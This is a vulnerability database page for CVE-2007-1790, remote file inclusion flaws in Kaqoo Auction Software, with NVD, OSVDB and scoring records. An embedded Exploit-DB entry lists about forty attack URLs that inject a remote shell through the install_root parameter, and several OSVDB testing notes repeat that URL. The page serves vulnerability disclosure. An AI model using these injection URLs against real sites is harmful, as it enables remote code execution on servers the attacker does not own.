Search...

CVE-2007-1790

2007-03-31T10:19:00

ID CVE-2007-1790
Type cve
Reporter cve@mitre.org
Modified 2017-10-11T01:31:00

Description

Multiple PHP remote file inclusion vulnerabilities in Kaqoo Auction Software Free Edition allow remote attackers to execute arbitrary PHP code via a URL in the install_root parameter to (1) support.inc.php, (2) function.inc.php, (3) rdal_object.inc.php, (4) rdal_editor.inc.php. (5) login.inc.php, (6) request.inc.php, and (7) categories.inc.php in include/core/; (8) save.inc.php, (9) preview.inc.php, (10) edit_item.inc.php, (11) new_item.inc.php, and (12) item_info.inc.php in include/display/item/; (13) search.inc.php, (14) item_edit.inc.php, (15) register_succsess.inc.php, (16) context_menu.inc.php, (17) item_repost.inc.php, (18) balance.inc.php, (19) featured.inc.php, (20) user.inc.php, (21) buynow.inc.php, (22) install_complete.inc.php, (23) fees_info.inc.php, (24) user_feedback.inc.php, (25) admin_balance.inc.php, (26) activate.inc.php, (27) user_info.inc.php, (28) member.inc.php, (29) add_bid.inc.php, (30) items_filter.inc.php, (31) my_info.inc.php, (32) register.inc.php, (33) leave_feedback.inc.php, and (34) user_auctions.inc.php in include/display/; and (35) design/form.inc.php, (36) processor.inc.php, (37) interfaces.inc.php (38) left_menu.inc.php, (39) login.inc.php, and (40) categories.inc.php in include/.

JSON Vulners Source

Initial Source

{"id": "CVE-2007-1790", "bulletinFamily": "NVD", "title": "CVE-2007-1790", "description": "Multiple PHP remote file inclusion vulnerabilities in Kaqoo Auction Software Free Edition allow remote attackers to execute arbitrary PHP code via a URL in the install_root parameter to (1) support.inc.php, (2) function.inc.php, (3) rdal_object.inc.php, (4) rdal_editor.inc.php. (5) login.inc.php, (6) request.inc.php, and (7) categories.inc.php in include/core/; (8) save.inc.php, (9) preview.inc.php, (10) edit_item.inc.php, (11) new_item.inc.php, and (12) item_info.inc.php in include/display/item/; (13) search.inc.php, (14) item_edit.inc.php, (15) register_succsess.inc.php, (16) context_menu.inc.php, (17) item_repost.inc.php, (18) balance.inc.php, (19) featured.inc.php, (20) user.inc.php, (21) buynow.inc.php, (22) install_complete.inc.php, (23) fees_info.inc.php, (24) user_feedback.inc.php, (25) admin_balance.inc.php, (26) activate.inc.php, (27) user_info.inc.php, (28) member.inc.php, (29) add_bid.inc.php, (30) items_filter.inc.php, (31) my_info.inc.php, (32) register.inc.php, (33) leave_feedback.inc.php, and (34) user_auctions.inc.php in include/display/; and (35) design/form.inc.php, (36) processor.inc.php, (37) interfaces.inc.php (38) left_menu.inc.php, (39) login.inc.php, and (40) categories.inc.php in include/.", "published": "2007-03-31T10:19:00", "modified": "2017-10-11T01:31:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1790", "reporter": "cve@mitre.org", "references": ["http://www.osvdb.org/34553", "http://www.osvdb.org/34557", "http://secunia.com/advisories/24696", "http://www.osvdb.org/34546", "http://www.osvdb.org/34563", "http://www.osvdb.org/34569", "http://www.osvdb.org/34574", "http://www.osvdb.org/34565", "http://www.osvdb.org/34577", "http://www.osvdb.org/34579", "http://www.osvdb.org/34580", "http://www.osvdb.org/34567", "http://www.osvdb.org/34583", "http://www.osvdb.org/34549", "http://www.osvdb.org/34558", "http://www.osvdb.org/34562", "http://www.osvdb.org/34582", "http://www.osvdb.org/34551", "http://www.osvdb.org/34552", "http://www.osvdb.org/34571", "http://www.osvdb.org/34570", "http://www.osvdb.org/34576", "http://www.osvdb.org/34578", "http://www.osvdb.org/34547", "http://www.osvdb.org/34545", "https://exchange.xforce.ibmcloud.com/vulnerabilities/33335", "http://www.osvdb.org/34564", "http://www.osvdb.org/34566", "https://www.exploit-db.com/exploits/3607", "http://www.osvdb.org/34581", "http://www.osvdb.org/34584", "http://www.osvdb.org/34559", "http://www.osvdb.org/34572", "http://www.osvdb.org/34556", "http://www.osvdb.org/34554", "http://www.osvdb.org/34561", "http://www.vupen.com/english/advisories/2007/1180", "http://www.osvdb.org/34560", "http://www.osvdb.org/34573", "http://www.osvdb.org/34555", "http://www.securityfocus.com/bid/23211", "http://www.osvdb.org/34575", "http://www.osvdb.org/34548", "http://www.osvdb.org/34550", "http://www.osvdb.org/34568"], "cvelist": ["CVE-2007-1790"], "type": "cve", "lastseen": "2019-05-29T18:08:59", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "2979c80db4ff7dbbeebafd2a52aa4e5e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "aa71e3a2cd75163a2e94be28d47f1479"}, {"key": "cpe23", "hash": "4095fb827f387fa943f55c5d6e049873"}, {"key": "cvelist", "hash": "98eea72defe61d210fb749649df4af99"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "1997a83d1164e580c617572d7a8583e2"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "697763cf5916ecb521e5a8e56e23f6d3"}, {"key": "description", "hash": "6a5b39ee5a9deda5686b1c8c4dbe8895"}, {"key": "href", "hash": "d7ff061b683df5966b014bd58c57e28f"}, {"key": "modified", "hash": "ff318a5b951f747bdf7782c6bc63531b"}, {"key": "published", "hash": "97b0d6810dc94081c20388a6a3895ebc"}, {"key": "references", "hash": "af7d599dce57f64119a95877ebe2a14a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5ec52bbe9e8040959857f0e14a9193b4"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "7bae74255466c5238f5ffff95ef820bc3a9c73a426d6685cceb204a5b51385b9", "viewCount": 1, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-29T18:08:59"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:34547", "OSVDB:34584", "OSVDB:34564", "OSVDB:34569", "OSVDB:34559", "OSVDB:34554", "OSVDB:34556", "OSVDB:34579", "OSVDB:34575", "OSVDB:34546"]}, {"type": "exploitdb", "idList": ["EDB-ID:3607"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7521"]}], "modified": "2019-05-29T18:08:59"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "cpe": ["cpe:/a:kaqoo:kaqoo_auction_software:*"], "affectedSoftware": [{"name": "kaqoo kaqoo_auction_software", "operator": "eq", "version": "*"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:kaqoo:kaqoo_auction_software:*:*:free:*:*:*:*:*"], "cwe": ["CWE-94"]}

{"exploitdb": [{"lastseen": "2016-01-31T18:53:54", "bulletinFamily": "exploit", "description": "Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities. CVE-2007-1790. Webapps exploit for php platform", "modified": "2007-03-29T00:00:00", "published": "2007-03-29T00:00:00", "id": "EDB-ID:3607", "href": "https://www.exploit-db.com/exploits/3607/", "type": "exploitdb", "title": "Kaqoo Auction install_root Multiple Remote File Include Vulnerabilities", "sourceData": "*************************************************************\nTo ConTacT mE @ www.Asb-May.net/bb\nScRiPt:-http://kaqoo.com/server/download.php\nGrEaTz To:-ToOofa-HaCk.eGy-Alk()mad()z-Bright Dark (All AsB-MaY DisCoverY\nExPloIts GrOup)\nDiscovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>\n******************************************************************************\nWrong Code:-\ninclude_once(\"$install_root\n********************************************************************************\nExPlOiT:-http://www.SitE.com/include/core/support.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/function.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/rdal_object.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/rdal_editor.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/login.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/request.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/categories.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/save.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/preview.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/edit_item.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/new_item.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/item_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/search.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item_edit.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/register_succsess.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/context_menu.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item_repost.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/balance.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/featured.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/buynow.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/install_complete.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/fees_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_feedback.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/admin_balance.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/activate.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/member.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/add_bid.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/items_filter.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/my_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/register.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/leave_feedback.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_auctions.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/design/form.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/processor.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/interfaces.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/left_menu.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/login.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/categories.inc.php?install_root=[Shell]\n********************************************************************************\n\n# milw0rm.com [2007-03-29]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3607/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/function.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/function.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/core/function.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34546", "id": "OSVDB:34546", "title": "Kaqoo Auction Software Free Edition include/core/function.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/processor.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/processor.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/processor.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34580", "id": "OSVDB:34580", "title": "Kaqoo Auction Software Free Edition include/processor.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/interfaces.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/interfaces.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/interfaces.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34581", "id": "OSVDB:34581", "title": "Kaqoo Auction Software Free Edition include/interfaces.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/member.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/member.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/member.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34572", "id": "OSVDB:34572", "title": "Kaqoo Auction Software Free Edition include/display/member.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/items_filter.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/items_filter.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/items_filter.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34574", "id": "OSVDB:34574", "title": "Kaqoo Auction Software Free Edition include/display/items_filter.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/register.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/register.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/register.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34576", "id": "OSVDB:34576", "title": "Kaqoo Auction Software Free Edition include/display/register.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/user_feedback.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/user_feedback.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/user_feedback.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34568", "id": "OSVDB:34568", "title": "Kaqoo Auction Software Free Edition include/display/user_feedback.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/item/item_info.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/item/item_info.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/item/item_info.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34556", "id": "OSVDB:34556", "title": "Kaqoo Auction Software Free Edition include/display/item/item_info.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/rdal_object.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/rdal_object.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/core/rdal_object.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34547", "id": "OSVDB:34547", "title": "Kaqoo Auction Software Free Edition include/core/rdal_object.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/design/form.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/design/form.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/design/form.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34579", "id": "OSVDB:34579", "title": "Kaqoo Auction Software Free Edition include/design/form.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-02T00:00:00", "published": "2007-04-02T00:00:00", "id": "SECURITYVULNS:VULN:7521", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7521", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}